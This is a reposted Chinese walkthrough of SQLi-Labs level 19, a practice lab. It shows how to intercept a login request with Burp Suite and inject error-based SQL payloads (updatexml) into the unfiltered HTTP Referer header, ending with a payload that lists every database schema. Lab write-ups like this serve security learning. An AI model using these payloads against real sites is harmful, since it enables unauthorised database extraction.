SQLi LABS Less-19

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下

img

img

img

 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手

img

img

 

首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer

然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库

1' and updatexml(1,0x7e,1) and '

img

img

 

获取所有数据库

1' and updatexml(1,concat(0x7e,substr(
(select group_concat(schema_name)
from information_schema.schemata)
,1,31)),3) and '

imgimg

 

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/119706248
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复